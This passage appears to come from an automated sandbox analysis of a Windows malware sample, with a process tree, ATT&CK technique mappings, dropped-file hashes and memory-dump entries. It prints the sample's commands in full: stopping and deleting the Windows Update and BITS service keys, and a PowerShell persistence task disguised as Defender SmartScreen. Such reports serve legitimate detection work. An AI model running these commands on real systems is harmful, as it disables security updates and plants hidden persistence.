  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1740
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:524
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:692
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1556
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:272
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:576
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1544
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:696
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1340
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenMachine /tr "'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:320
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:988

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1168

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TeMaPEZQleQYhYzRyWJjPjzpfRFEgmot

Filesize
71KB

MD5
dfeffc3924409d9c9d3c8cae05be922b

SHA1
a89046cbf54c00e17ff0a5f3e1a8f01eb399bce4

SHA256
06ea3ad1c1c1067bfdfaa5ad8a91632fac6cad9776ded85fa65d3b6181d89be6

SHA512
d9614ecf528a2bf48cafe99a4c54d5c9f3656d628001fbf575d367d5ad8008cf30a58a7b3d9489d8534064442df89a7263df4a91d0863dcd6cc33574c576da33

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7f0f1f4a6c4615c7d2067c2854d524cb

SHA1
e99514e8cd534aecb7934697a777dc26050ebb2a

SHA256
afea990267453690783e32a212ed54b89f09e5308a70b78ecf470988316ca042

SHA512
411d27730e65eb1f7a7ad2f2e91a1bfac0590fa1e9ad4a1b7f2da7b1ee7de185129a99629df64d0861784fc1c02847923c2ac66504456e30a8ad578ddfc30bdb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMTGFZ9PPFWF4RGGDXAH.temp

Filesize
7KB

MD5
7f0f1f4a6c4615c7d2067c2854d524cb

SHA1
e99514e8cd534aecb7934697a777dc26050ebb2a

SHA256
afea990267453690783e32a212ed54b89f09e5308a70b78ecf470988316ca042

SHA512
411d27730e65eb1f7a7ad2f2e91a1bfac0590fa1e9ad4a1b7f2da7b1ee7de185129a99629df64d0861784fc1c02847923c2ac66504456e30a8ad578ddfc30bdb

Download Submit
C:\Windows\System32\Tasks\Telemetry Logging

Filesize
3KB

MD5
0d849dbfd28dbe08073aee761e7c20e5

SHA1
61889592646295199986f57ca5ebb57c6b836b19

SHA256
9efd53f8c25bcd73814fd0d4c39c7726edf3bc98060e125184d7816ec74702e3

SHA512
3c4bcec5088918fefb101d6d998a6c3d1d808491a7a43718f346d3d76aeb972b2f8db689233583ca459b03a2d248407c39123db1832efec02ece46f2a19eed44

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
memory/328-302-0x0000000000B50000-0x0000000000B77000-memory.dmp

Filesize
156KB

Download
memory/420-189-0x00000000008D0000-0x00000000008F7000-memory.dmp

Filesize
156KB

Download
memory/420-178-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/420-179-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/420-175-0x00000000008A0000-0x00000000008C1000-memory.dmp

Filesize
132KB

Download
memory/420-177-0x00000000008D0000-0x00000000008F7000-memory.dmp

Filesize
156KB

Download
memory/420-174-0x00000000008A0000-0x00000000008C1000-memory.dmp

Filesize
132KB

Download
memory/468-183-0x0000000000220000-0x0000000000247000-memory.dmp

Filesize
156KB

Download
memory/468-190-0x0000000000220000-0x0000000000247000-memory.dmp

Filesize
156KB

Download
memory/468-185-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/468-186-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/476-194-0x0000000000190000-0x00000000001B7000-memory.dmp

Filesize
156KB

Download
memory/476-193-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/476-327-0x0000000000190000-0x00000000001B7000-memory.dmp

Filesize
156KB

Download
memory/476-191-0x0000000000190000-0x00000000001B7000-memory.dmp

Filesize
156KB

Download
memory/476-195-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/484-206-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/484-203-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/484-202-0x00000000001D0000-0x00000000001F7000-memory.dmp

Filesize
156KB

Download
memory/484-290-0x00000000001D0000-0x00000000001F7000-memory.dmp

Filesize
156KB

Download
memory/604-289-0x0000000000410000-0x0000000000437000-memory.dmp

Filesize
156KB

Download
memory/604-201-0x0000000000410000-0x0000000000437000-memory.dmp

Filesize
156KB

Download
memory/604-207-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/604-204-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/632-166-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/632-318-0x0000000000210000-0x0000000000237000-memory.dmp

Filesize
156KB

Download
memory/632-171-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/632-168-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/632-169-0x00000000772C0000-0x0000000077469000-memory.dmp

Filesize
1.7MB

Download
memory/632-170-0x00000000770A0000-0x00000000771BF000-memory.dmp

Filesize
1.1MB

Download
memory/684-291-0x0000000000100000-0x0000000000127000-memory.dmp

Filesize
156KB

Download
memory/684-215-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/684-213-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/684-211-0x0000000000100000-0x0000000000127000-memory.dmp

Filesize
156KB

Download
memory/756-306-0x0000000001D00000-0x0000000001D27000-memory.dmp

Filesize
156KB

Download
memory/756-309-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/764-216-0x0000000000A30000-0x0000000000A57000-memory.dmp

Filesize
156KB

Download
memory/764-294-0x0000000000A30000-0x0000000000A57000-memory.dmp

Filesize
156KB

Download
memory/764-221-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/764-219-0x000007FEBDA50000-0x000007FEBDA60000-memory.dmp

Filesize
64KB

Download
memory/804-313-0x00000000002F0000-0x0000000000317000-memory.dmp

Filesize
156KB

Download
memory/804-314-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/824-298-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/824-297-0x0000000000910000-0x0000000000937000-memory.dmp

Filesize
156KB

Download
memory/824-222-0x0000000000910000-0x0000000000937000-memory.dmp

Filesize
156KB

Download
memory/864-300-0x0000000000990000-0x00000000009B7000-memory.dmp

Filesize
156KB

Download
memory/864-301-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/884-161-0x00000000010D0000-0x0000000001110000-memory.dmp

Filesize
256KB

Download
memory/888-96-0x0000000000430000-0x0000000000444000-memory.dmp

Filesize
80KB

Download
memory/888-325-0x0000000004AE0000-0x0000000004B20000-memory.dmp

Filesize
256KB

Download
memory/888-89-0x00000000002B0000-0x000000000041C000-memory.dmp

Filesize
1.4MB

Download
memory/888-324-0x0000000004AE0000-0x0000000004B20000-memory.dmp

Filesize
256KB

Download
memory/888-95-0x0000000005380000-0x00000000054CE000-memory.dmp

Filesize
1.3MB

Download
memory/888-94-0x0000000004F50000-0x00000000050B6000-memory.dmp

Filesize
1.4MB

Download
memory/888-155-0x0000000004AE0000-0x0000000004B20000-memory.dmp

Filesize
256KB

Download
memory/888-154-0x0000000004AE0000-0x0000000004B20000-memory.dmp

Filesize
256KB

Download
memory/888-184-0x0000000004AE0000-0x0000000004B20000-memory.dmp

Filesize
256KB

Download
memory/940-312-0x00000000001A0000-0x00000000001C7000-memory.dmp

Filesize
156KB

Download
memory/940-317-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/988-121-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1000-303-0x0000000000A90000-0x0000000000AB7000-memory.dmp

Filesize
156KB

Download
memory/1000-304-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/1048-153-0x0000000000280000-0x00000000003BD000-memory.dmp

Filesize
1.2MB

Download
memory/1048-103-0x0000000001ED0000-0x00000000023D4000-memory.dmp

Filesize
5.0MB

Download
memory/1060-56-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1060-54-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1084-307-0x00000000007C0000-0x00000000007E7000-memory.dmp

Filesize
156KB

Download
memory/1120-305-0x0000000001FE0000-0x0000000002007000-memory.dmp

Filesize
156KB

Download
memory/1168-308-0x0000000001AF0000-0x0000000001B17000-memory.dmp

Filesize
156KB

Download
memory/1216-323-0x00000000001B0000-0x00000000001D7000-memory.dmp

Filesize
156KB

Download
memory/1248-311-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/1248-310-0x0000000003870000-0x0000000003897000-memory.dmp

Filesize
156KB

Download
memory/1332-163-0x0000000001270000-0x0000000001296000-memory.dmp

Filesize
152KB

Download
memory/1332-158-0x0000000000940000-0x00000000009C0000-memory.dmp

Filesize
512KB

Download
memory/1332-156-0x0000000019B10000-0x0000000019DF2000-memory.dmp

Filesize
2.9MB

Download
memory/1332-165-0x00000000770A0000-0x00000000771BF000-memory.dmp

Filesize
1.1MB

Download
memory/1332-164-0x00000000772C0000-0x0000000077469000-memory.dmp

Filesize
1.7MB

Download
memory/1332-162-0x0000000000940000-0x00000000009C0000-memory.dmp

Filesize
512KB

Download
memory/1332-160-0x0000000000940000-0x00000000009C0000-memory.dmp

Filesize
512KB

Download
memory/1332-157-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/1332-159-0x0000000000940000-0x00000000009C0000-memory.dmp

Filesize
512KB

Download
memory/1692-120-0x000000013FDC0000-0x0000000140180000-memory.dmp

Filesize
3.8MB

Download
memory/1712-117-0x000000000249B000-0x00000000024D2000-memory.dmp

Filesize
220KB

Download
memory/1712-116-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1712-115-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/1712-114-0x000000001B160000-0x000000001B442000-memory.dmp

Filesize
2.9MB

Download
memory/1816-102-0x0000000002630000-0x0000000002638000-memory.dmp

Filesize
32KB

Download
memory/1816-106-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1816-107-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1816-101-0x000000001B0E0000-0x000000001B3C2000-memory.dmp

Filesize
2.9MB

Download
memory/1816-105-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1816-104-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1820-316-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/1820-315-0x0000000000330000-0x0000000000357000-memory.dmp

Filesize
156KB

Download
memory/1960-346-0x0000000000130000-0x0000000000157000-memory.dmp

Filesize
156KB

Download
memory/1960-348-0x0000000037300000-0x0000000037310000-memory.dmp

Filesize
64KB

Download
memory/1960-357-0x0000000000190000-0x00000000001B7000-memory.dmp

Filesize
156KB

Download
memory/1960-363-0x0000000000130000-0x0000000000157000-memory.dmp

Filesize
156KB

Download
memory/2004-60-0x0000000001DA0000-0x0000000001DE0000-memory.dmp

Filesize
256KB

Download
memory/2004-59-0x0000000001DA0000-0x0000000001DE0000-memory.dmp

Filesize
256KB

Download